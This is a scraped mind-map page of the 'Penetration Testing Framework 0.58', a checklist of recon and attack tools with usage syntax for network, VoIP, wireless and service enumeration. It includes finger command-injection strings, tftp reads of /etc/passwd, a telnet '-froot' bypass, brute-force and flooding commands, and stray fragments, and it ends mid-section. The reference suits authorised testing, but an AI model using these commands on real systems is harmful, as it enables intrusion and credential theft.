Penetration Testing Framework 0.58

Começar. É Gratuito
ou inscrever-se com seu endereço de e-mail
Penetration Testing Framework 0.58 por Mind Map: Penetration Testing Framework 0.58

1. Back end files

1.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

2. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.

2.1. Default Port Lists

2.1.1. Windows

2.1.2. *nix

2.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific

2.2.1. General Enumeration Tools

2.2.1.1. nmap

2.2.1.1.1. nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml

2.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results

2.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results

2.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason

2.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list

2.2.1.2. netcat

2.2.1.2.1. nc -v -n IP_Address port

2.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number

2.2.1.3. amap

2.2.1.3.1. amap -bqv 192.168.1.1 80

2.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]

2.2.1.4. xprobe2

2.2.1.4.1. xprobe2 192.168.1.1

2.2.1.5. sinfp

2.2.1.5.1. ./sinfp.pl -i -p

2.2.1.6. nbtscan

2.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)

2.2.1.7. hping

2.2.1.7.1. hping ip_address

2.2.1.8. scanrand

2.2.1.8.1. scanrand ip_address:all

2.2.1.9. unicornscan

2.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E

2.2.1.10. netenum

2.2.1.10.1. netenum network/netmask timeout

2.2.1.11. fping

2.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)

2.2.2. Firewall Specific Tools

2.2.2.1. firewalk

2.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]

2.2.2.2. ftester

2.2.2.2.1. host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log

2.2.3. Default Passwords (Examine list)

2.2.3.1. Passwords A

2.2.3.2. Passwords B

2.2.3.3. Passwords C

2.2.3.4. Passwords D

2.2.3.5. Passwords E

2.2.3.6. Passwords F

2.2.3.7. Passwords G

2.2.3.8. Passwords H

2.2.3.9. Passwords I

2.2.3.10. Passwords J

2.2.3.11. Passwords K

2.2.3.12. Passwords L

2.2.3.13. Passwords M

2.2.3.14. Passwords N

2.2.3.15. Passwords O

2.2.3.16. Passwords P

2.2.3.17. Passwords R

2.2.3.18. Passwords S

2.2.3.19. Passwords T

2.2.3.20. Passwords U

2.2.3.21. Passwords V

2.2.3.22. Passwords W

2.2.3.23. Passwords X

2.2.3.24. Passwords Y

2.2.3.25. Passwords Z

2.2.3.26. Passwords (Numeric)

2.3. Active Hosts

2.3.1. Open TCP Ports

2.3.2. Closed TCP Ports

2.3.3. Open UDP Ports

2.3.4. Closed UDP Ports

2.3.5. Service Probing

2.3.5.1. SMTP Mail Bouncing

2.3.5.2. Banner Grabbing

2.3.5.2.1. Other

2.3.5.2.2. HTTP

2.3.5.2.3. HTTPS

2.3.5.2.4. SMTP

2.3.5.2.5. POP3

2.3.5.2.6. FTP

2.3.6. ICMP Responses

2.3.6.1. Type 3 (Port Unreachable)

2.3.6.2. Type 8 (Echo Request)

2.3.6.3. Type 13 (Timestamp Request)

2.3.6.4. Type 15 (Information Request)

2.3.6.5. Type 17 (Subnet Address Mask Request)

2.3.6.6. Responses from broadcast address

2.3.7. Source Port Scans

2.3.7.1. TCP/UDP 53 (DNS)

2.3.7.2. TCP 20 (FTP Data)

2.3.7.3. TCP 80 (HTTP)

2.3.7.4. TCP/UDP 88 (Kerberos)

2.3.8. Firewall Assessment

2.3.8.1. Firewalk

2.3.8.2. TCP/UDP/ICMP responses

2.3.9. OS Fingerprint

3. InitialProgram=c:\windows\system32\cmd.exe

4. Nabil contributed the AS/400 section.

5. VoIP Security

5.1. Sniffing Tools

5.1.1. AuthTool

5.1.2. Cain & Abel

5.1.3. Etherpeek

5.1.4. NetDude

5.1.5. Oreka

5.1.6. PSIPDump

5.1.7. SIPomatic

5.1.8. SIPv6 Analyzer

5.1.9. UCSniff

5.1.10. VoiPong

5.1.11. VOMIT

5.1.12. Wireshark

5.1.13. WIST - Web Interface for SIP Trace

5.2. Scanning and Enumeration Tools

5.2.1. enumIAX

5.2.2. fping

5.2.3. IAX Enumerator

5.2.4. iWar

5.2.5. Nessus

5.2.6. Nmap

5.2.7. SIP Forum Test Framework (SFTF)

5.2.8. SIPcrack

5.2.9. sipflanker

5.2.9.1. python sipflanker.py 192.168.1-254

5.2.10. SIP-Scan

5.2.11. SIP.Tastic

5.2.12. SIPVicious

5.2.13. SiVuS

5.2.14. SMAP

5.2.14.1. smap IP_Address/Subnet_Mask

5.2.14.2. smap -o IP_Address/Subnet_Mask

5.2.14.3. smap -l IP_Address

5.2.15. snmpwalk

5.2.16. VLANping

5.2.17. VoIPAudit

5.2.18. VoIP GHDB Entries

5.2.19. VoIP Voicemail Database

5.3. Packet Creation and Flooding Tools

5.3.1. H.323 Injection Files

5.3.2. H225regreject

5.3.3. IAXHangup

5.3.4. IAXAuthJack

5.3.5. IAX.Brute

5.3.6. IAXFlooder

5.3.6.1. ./iaxflood sourcename destinationname numpackets

5.3.7. INVITE Flooder

5.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets

5.3.8. kphone-ddos

5.3.9. RTP Flooder

5.3.10. rtpbreak

5.3.11. Scapy

5.3.12. Seagull

5.3.13. SIPBomber

5.3.14. SIPNess

5.3.15. SIPp

5.3.16. SIPsak

5.3.16.1. Tracing paths: - sipsak -T -s sip:usernaem@domain

5.3.16.2. Options request:- sipsak -vv -s sip:username@domain

5.3.16.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain

5.3.17. SIP-Send-Fun

5.3.18. SIPVicious

5.3.19. Spitter

5.3.20. TFTP Brute Force

5.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>

5.3.21. UDP Flooder

5.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

5.3.22. UDP Flooder (with VLAN Support)

5.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

5.3.23. Voiphopper

5.4. Fuzzing Tools

5.4.1. Asteroid

5.4.2. Codenomicon VoIP Fuzzers

5.4.3. Fuzzy Packet

5.4.4. Mu Security VoIP Fuzzing Platform

5.4.5. ohrwurm RTP Fuzzer

5.4.6. PROTOS H.323 Fuzzer

5.4.7. PROTOS SIP Fuzzer

5.4.8. SIP Forum Test Framework (SFTF)

5.4.9. Sip-Proxy

5.4.10. Spirent ThreatEx

5.5. Signaling Manipulation Tools

5.5.1. AuthTool

5.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

5.5.2. BYE Teardown

5.5.3. Check Sync Phone Rebooter

5.5.4. RedirectPoison

5.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"

5.5.5. Registration Adder

5.5.6. Registration Eraser

5.5.7. Registration Hijacker

5.5.8. SIP-Kill

5.5.9. SIP-Proxy-Kill

5.5.10. SIP-RedirectRTP

5.5.11. SipRogue

5.5.12. vnak

5.6. Media Manipulation Tools

5.6.1. RTP InsertSound

5.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

5.6.2. RTP MixSound

5.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

5.6.3. RTPProxy

5.6.4. RTPInject

5.7. Generic Software Suites

5.7.1. OAT Office Communication Server Tool Assessment

5.7.2. EnableSecurity VOIPPACK

5.7.2.1. Note: - Add-on for Immunity Canvas

5.8. References

5.8.1. URL's

5.8.1.1. Common Vulnerabilities and Exploits (CVE)

5.8.1.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip

5.8.1.2. Default Passwords

5.8.1.3. Hacking Exposed VoIP

5.8.1.3.1. Tool Pre-requisites

5.8.1.4. VoIPsa

5.8.2. White Papers

5.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems

5.8.2.2. An Analysis of VoIP Security Threats and Tools

5.8.2.3. Hacking VoIP Exposed

5.8.2.4. Security testing of SIP implementations

5.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks

5.8.2.6. Two attacks against VoIP

5.8.2.7. VoIP Attacks!

5.8.2.8. VoIP Security Audit Program (VSAP)

6. Wireless Penetration

6.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.

6.1.1. Site Map

6.1.1.1. RF Map

6.1.1.1.1. Lines of Sight

6.1.1.1.2. Signal Coverage

6.1.1.2. Physical Map

6.1.1.2.1. Triangulate APs

6.1.1.2.2. Satellite Imagery

6.1.2. Network Map

6.1.2.1. MAC Filter

6.1.2.1.1. Authorised MAC Addresses

6.1.2.1.2. Reaction to Spoofed MAC Addresses

6.1.2.2. Encryption Keys utilised

6.1.2.2.1. WEP

6.1.2.2.2. WPA/PSK

6.1.2.2.3. 802.1x

6.1.2.3. Access Points

6.1.2.3.1. ESSID

6.1.2.3.2. BSSIDs

6.1.2.4. Wireless Clients

6.1.2.4.1. MAC Addresses

6.1.2.4.2. Intercepted Traffic

6.2. Wireless Toolkit

6.2.1. Wireless Discovery

6.2.1.1. Aerosol

6.2.1.2. Airfart

6.2.1.3. Aphopper

6.2.1.4. Apradar

6.2.1.5. BAFFLE

6.2.1.6. inSSIDer

6.2.1.7. iWEPPro

6.2.1.8. karma

6.2.1.9. KisMAC-ng

6.2.1.10. Kismet

6.2.1.11. MiniStumbler

6.2.1.12. Netstumbler

6.2.1.13. Vistumbler

6.2.1.14. Wellenreiter

6.2.1.15. Wifi Hopper

6.2.1.16. WirelessMon

6.2.1.17. WiFiFoFum

6.2.2. Packet Capture

6.2.2.1. Airopeek

6.2.2.2. Airpcap

6.2.2.3. Airtraf

6.2.2.4. Apsniff

6.2.2.5. Cain

6.2.2.6. Commview

6.2.2.7. Ettercap

6.2.2.8. Netmon

6.2.2.8.1. nmwifi

6.2.2.9. Wireshark

6.2.3. EAP Attack tools

6.2.3.1. eapmd5pass

6.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump

6.2.3.1.2. Untitled

6.2.4. Leap Attack Tools

6.2.4.1. asleap

6.2.4.2. thc leap cracker

6.2.4.3. anwrap

6.2.5. WEP/ WPA Password Attack Tools

6.2.5.1. Airbase

6.2.5.2. Aircrack-ptw

6.2.5.3. Aircrack-ng

6.2.5.4. Airsnort

6.2.5.5. cowpatty

6.2.5.6. FiOS Wireless Key Calculator

6.2.5.7. iWifiHack

6.2.5.8. KisMAC-ng

6.2.5.9. Rainbow Tables

6.2.5.10. wep attack

6.2.5.11. wep crack

6.2.5.12. wzcook

6.2.6. Frame Generation Software

6.2.6.1. Airgobbler

6.2.6.2. airpwn

6.2.6.3. Airsnarf

6.2.6.4. Commview

6.2.6.5. fake ap

6.2.6.6. void 11

6.2.6.7. wifi tap

6.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]

6.2.6.8. FreeRADIUS - Wireless Pwnage Edition

6.2.7. Mapping Software

6.2.7.1. Online Mapping

6.2.7.1.1. WIGLE

6.2.7.1.2. Skyhook

6.2.7.2. Tools

6.2.7.2.1. Knsgem

6.2.8. File Format Conversion Tools

6.2.8.1. ns1 recovery and conversion tool

6.2.8.2. warbable

6.2.8.3. warkizniz

6.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]

6.2.8.4. ivstools

6.2.9. IDS Tools

6.2.9.1. WIDZ

6.2.9.2. War Scanner

6.2.9.3. Snort-Wireless

6.2.9.4. AirDefense

6.2.9.5. AirMagnet

6.3. WLAN discovery

6.3.1. Unencrypted WLAN

6.3.1.1. Visible SSID

6.3.1.1.1. Sniff for IP range

6.3.1.2. Hidden SSID

6.3.1.2.1. Deauth client

6.3.2. WEP encrypted WLAN

6.3.2.1. Visible SSID

6.3.2.1.1. WEPattack

6.3.2.2. Hidden SSID

6.3.2.2.1. Deauth client

6.3.3. WPA / WPA2 encrypted WLAN

6.3.3.1. Deauth client

6.3.3.1.1. Capture EAPOL handshake

6.3.4. LEAP encrypted WLAN

6.3.4.1. Deauth client

6.3.4.1.1. Break LEAP

6.3.5. 802.1x WLAN

6.3.5.1. Create Rogue Access Point

6.3.5.1.1. Airsnarf

6.3.5.1.2. fake ap

6.3.5.1.3. Hotspotter

6.3.5.1.4. Karma

6.3.5.1.5. Linux rogue AP

6.3.6. Resources

6.3.6.1. URL's

6.3.6.1.1. Wirelessdefence.org

6.3.6.1.2. Russix

6.3.6.1.3. Wardrive.net

6.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)

6.3.6.2. White Papers

6.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4

6.3.6.2.2. 802.11b Firmware-Level Attacks

6.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective

6.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment

6.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds

6.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz

6.3.6.2.7. Active behavioral fingerprinting of wireless devices

6.3.6.3. Common Vulnerabilities and Exploits (CVE)

6.3.6.3.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless

7. Pre-Inspection Visit - template

8. pwdump [-h][-o][-u][-p] machineName

9. Client Side Security

10. Set objShell = CreateObject("WScript.Shell")

11. Check visible areas for sensitive information.

12. Enumeration

12.1. Daytime port 13 open

12.1.1. nmap nse script

12.1.1.1. daytime

12.2. FTP port 21 open

12.2.1. Fingerprint server

12.2.1.1. telnet ip_address 21 (Banner grab)

12.2.1.2. Run command ftp ip_address

12.2.1.3. ftp@example.com

12.2.1.4. Check for anonymous access

12.2.1.4.1. ftp ip_addressUsername: anonymous OR anonPassword: any@email.com

12.2.2. Password guessing

12.2.2.1. Hydra brute force

12.2.2.2. medusa

12.2.2.3. Brutus

12.2.3. Examine configuration files

12.2.3.1. ftpusers

12.2.3.2. ftp.conf

12.2.3.3. proftpd.conf

12.2.4. MiTM

12.2.4.1. pasvagg.pl

12.3. SSH port 22 open

12.3.1. Fingerprint server

12.3.1.1. telnet ip_address 22 (banner grab)

12.3.1.2. scanssh

12.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

12.3.2. Password guessing

12.3.2.1. ssh root@ip_address

12.3.2.2. guess-who

12.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location

12.3.2.3. Hydra brute force

12.3.2.4. brutessh

12.3.2.5. Ruby SSH Bruteforcer

12.3.3. Examine configuration files

12.3.3.1. ssh_config

12.3.3.2. sshd_config

12.3.3.3. authorized_keys

12.3.3.4. ssh_known_hosts

12.3.3.5. .shosts

12.3.4. SSH Client programs

12.3.4.1. tunnelier

12.3.4.2. winsshd

12.3.4.3. putty

12.3.4.4. winscp

12.4. Telnet port 23 open

12.4.1. Fingerprint server

12.4.1.1. telnet ip_address

12.4.1.1.1. Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster

12.4.1.2. telnetfp

12.4.2. Password Attack

12.4.2.1. Untitled

12.4.2.2. Hydra brute force

12.4.2.3. Brutus

12.4.2.4. telnet -l "-froot" hostname (Solaris 10+)

12.4.3. Examine configuration files

12.4.3.1. /etc/inetd.conf

12.4.3.2. /etc/xinetd.d/telnet

12.4.3.3. /etc/xinetd.d/stelnet

12.5. Sendmail Port 25 open

12.5.1. Fingerprint server

12.5.1.1. telnet ip_address 25 (banner grab)

12.5.2. Mail Server Testing

12.5.2.1. Enumerate users

12.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)

12.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)

12.5.2.2. Mail Spoof Test

12.5.2.2.1. HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT

12.5.2.3. Mail Relay Test

12.5.2.3.1. Untitled

12.5.3. Examine Configuration Files

12.5.3.1. sendmail.cf

12.5.3.2. submit.cf

12.6. DNS port 53 open

12.6.1. Fingerprint server/ service

12.6.1.1. host

12.6.1.1.1. host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.

12.6.1.2. nslookup

12.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]

12.6.1.3. dig

12.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]

12.6.1.4. whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup

12.6.2. DNS Enumeration

12.6.2.1. Bile Suite

12.6.2.1.1. perl BiLE.pl [website] [project_name]

12.6.2.1.2. perl BiLE-weigh.pl [website] [input file]

12.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>

12.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]

12.6.2.1.5. perl exp-tld.pl [input file] [output file]

12.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]

12.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]

12.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]

12.6.2.2. txdns

12.6.2.2.1. txdns -rt -t domain_name

12.6.2.2.2. txdns -x 50 -bb domain_name

12.6.2.3. nmap nse scripts

12.6.2.3.1. dns-random-srcport

12.6.2.3.2. dns-random-txid

12.6.2.3.3. dns-recursion

12.6.2.3.4. dns-zone-transfer

12.6.3. Examine Configuration Files

12.6.3.1. host.conf

12.6.3.2. resolv.conf

12.6.3.3. named.conf

12.7. TFTP port 69 open

12.7.1. TFTP Enumeration

12.7.1.1. tftp ip_address PUT local_file

12.7.1.2. tftp ip_address GET conf.txt (or other files)

12.7.1.3. Solarwinds TFTP server

12.7.1.4. tftp – i <IP> GET /etc/passwd (old Solaris)

12.7.2. TFTP Bruteforcing

12.7.2.1. TFTP bruteforcer

12.7.2.2. Cisco-Torch

12.8. Finger Port 79 open

12.8.1. User enumeration

12.8.1.1. finger 'a b c d e f g h' @example.com

12.8.1.2. finger admin@example.com

12.8.1.3. finger user@example.com

12.8.1.4. finger 0@example.com

12.8.1.5. finger .@example.com

12.8.1.6. finger **@example.com

12.8.1.7. finger test@example.com

12.8.1.8. finger @example.com

12.8.1.9. nmap nse script

12.8.1.9.1. finger

12.8.2. Command execution

12.8.2.1. finger "|/bin/id@example.com"

12.8.2.2. finger "|/bin/ls -a /@example.com"

12.8.3. Finger Bounce

12.8.3.1. finger user@host@victim

12.8.3.2. finger @internal@external

12.9. Web Ports 80,8080 etc. open

12.9.1. Fingerprint server

12.9.1.1. Telnet ip_address port

12.9.1.2. Firefox plugins

12.9.1.2.1. All

12.9.1.2.2. Specific

12.9.2. Crawl website

12.9.2.1. lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source

12.9.2.2. httprint

12.9.2.3. Metagoofil

12.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

12.9.3. Web Directory enumeration

12.9.3.1. Nikto

12.9.3.1.1. nikto [-h target] [options]

12.9.3.2. DirBuster

12.9.3.3. Wikto

12.9.3.4. Goolag Scanner

12.9.4. Vulnerability Assessment

12.9.4.1. Manual Tests

12.9.4.1.1. Default Passwords

12.9.4.1.2. Install Backdoors

12.9.4.1.3. Method Testing

12.9.4.1.4. Upload Files

12.9.4.1.5. View Page Source

12.9.4.1.6. Input Validation Checks

12.9.4.1.7. Automated table and column iteration

12.9.4.2. Vulnerability Scanners

12.9.4.2.1. Acunetix

12.9.4.2.2. Grendelscan

12.9.4.2.3. NStealth

12.9.4.2.4. Obiwan III

12.9.4.2.5. w3af

12.9.4.3. Specific Applications/ Server Tools

12.9.4.3.1. Domino

12.9.4.3.2. Joomla

12.9.4.3.3. aspaudit.pl

12.9.4.3.4. Vbulletin

12.9.4.3.5. ZyXel

12.9.5. Proxy Testing

12.9.5.1. Burpsuite

12.9.5.2. Crowbar

12.9.5.3. Interceptor

12.9.5.4. Paros

12.9.5.5. Requester Raw

12.9.5.6. Suru

12.9.5.7. WebScarab

12.9.6. Examine configuration files

12.9.6.1. Generic

12.9.6.1.1. Examine httpd.conf/ windows config files

12.9.6.2. JBoss

12.9.6.2.1. JMX Console http://<IP>:8080/jmxconcole/

12.9.6.3. Joomla

12.9.6.3.1. configuration.php

12.9.6.3.2. diagnostics.php

12.9.6.3.3. joomla.inc.php

12.9.6.3.4. config.inc.php

12.9.6.4. Mambo

12.9.6.4.1. configuration.php

12.9.6.4.2. config.inc.php

12.9.6.5. Wordpress

12.9.6.5.1. setup-config.php

12.9.6.5.2. wp-config.php

12.9.6.6. ZyXel

12.9.6.6.1. /WAN.html (contains PPPoE ISP password)

12.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)

12.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)

12.9.6.6.4. /Firewall_DefPolicy.html (Firewall)

12.9.6.6.5. /CF_Keyword.html (Content Filter)

12.9.6.6.6. /RemMagWWW.html (Remote MGMT)

12.9.6.6.7. /rpSysAdmin.html (System)

12.9.6.6.8. /LAN_IP.html (LAN)

12.9.6.6.9. /NAT_General.html (NAT)

12.9.6.6.10. /ViewLog.html (Logs)

12.9.6.6.11. /rpFWUpload.html (Tools)

12.9.6.6.12. /DiagGeneral.html (Diagnostic)

12.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)

12.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)

12.9.6.6.15. Config Backups

12.9.7. Examine web server logs

12.9.7.1. c:\winnt\system32\Logfiles\W3SVC1

12.9.7.1.1. awk -F " " '{print $3,$11} filename | sort | uniq

12.9.8. References

12.9.8.1. White Papers

12.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness

12.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity

12.9.8.1.3. Blind Security Testing - An Evolutionary Approach

12.9.8.1.4. Command Injection in XML Signatures and Encryption

12.9.8.1.5. Input Validation Cheat Sheet

12.9.8.1.6. SQL Injection Cheat Sheet

12.9.8.2. Books

12.9.8.2.1. Hacking Exposed Web 2.0

12.9.8.2.2. Hacking Exposed Web Applications

12.9.8.2.3. The Web Application Hacker's Handbook

12.9.9. Exploit Frameworks

12.9.9.1. Brute-force Tools

12.9.9.1.1. Acunetix

12.9.9.2. Metasploit

12.9.9.3. w3af

12.10. Portmapper port 111 open

12.10.1. rpcdump.py

12.10.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)

12.10.2. rpcinfo

12.10.2.1. rpcinfo [options] IP_Address

12.11. NTP Port 123 open

12.11.1. NTP Enumeration

12.11.1.1. ntpdc -c monlist IP_ADDRESS

12.11.1.2. ntpdc -c sysinfo IP_ADDRESS

12.11.1.3. ntpq

12.11.1.3.1. host

12.11.1.3.2. hostname

12.11.1.3.3. ntpversion

12.11.1.3.4. readlist

12.11.1.3.5. version

12.11.2. Examine configuration files

12.11.2.1. ntp.conf

12.11.3. nmap nse script

12.11.3.1. ntp-info

12.12. NetBIOS Ports 135-139,445 open

12.12.1. NetBIOS enumeration

12.12.1.1. Enum

12.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>

12.12.1.2. Null Session

12.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""

12.12.1.3. Smbclient

12.12.1.3.1. smbclient -L //server/share password options

12.12.1.4. Superscan

12.12.1.4.1. Enumeration tab.

12.12.1.5. user2sid/sid2user

12.12.1.6. Winfo

12.12.2. NetBIOS brute force

12.12.2.1. Hydra

12.12.2.2. Brutus

12.12.2.3. Cain & Abel

12.12.2.4. getacct

12.12.2.5. NAT (NetBIOS Auditing Tool)

12.12.3. Examine Configuration Files

12.12.3.1. Smb.conf

12.12.3.2. lmhosts

12.13. SNMP port 161 open

12.13.1. Default Community Strings

12.13.1.1. public

12.13.1.2. private

12.13.1.3. cisco

12.13.1.3.1. cable-docsis

12.13.1.3.2. ILMI

12.13.2. MIB enumeration

12.13.2.1. Windows NT

12.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames

12.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name

12.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames

12.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services

12.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information

12.13.2.2. Solarwinds MIB walk

12.13.2.3. Getif

12.13.2.4. snmpwalk

12.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>

12.13.2.5. Snscan

12.13.2.6. Applications

12.13.2.6.1. ZyXel

12.13.2.7. nmap nse script

12.13.2.7.1. snmp-sysdescr

12.13.3. SNMP Bruteforce

12.13.3.1. onesixtyone

12.13.3.1.1. onesixytone -c SNMP.wordlist <IP>

12.13.3.2. cat

12.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist

12.13.3.3. Solarwinds SNMP Brute Force

12.13.3.4. ADMsnmp

12.13.3.5. nmap nse script

12.13.3.5.1. snmp-brute

12.13.4. Examine SNMP Configuration files

12.13.4.1. snmp.conf

12.13.4.2. snmpd.conf

12.13.4.3. snmp-config.xml

12.14. LDAP Port 389 Open

12.14.1. ldap enumeration

12.14.1.1. ldapminer

12.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d

12.14.1.2. luma

12.14.1.2.1. Gui based tool

12.14.1.3. ldp

12.14.1.3.1. Gui based tool

12.14.1.4. openldap

12.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]

12.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

12.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]

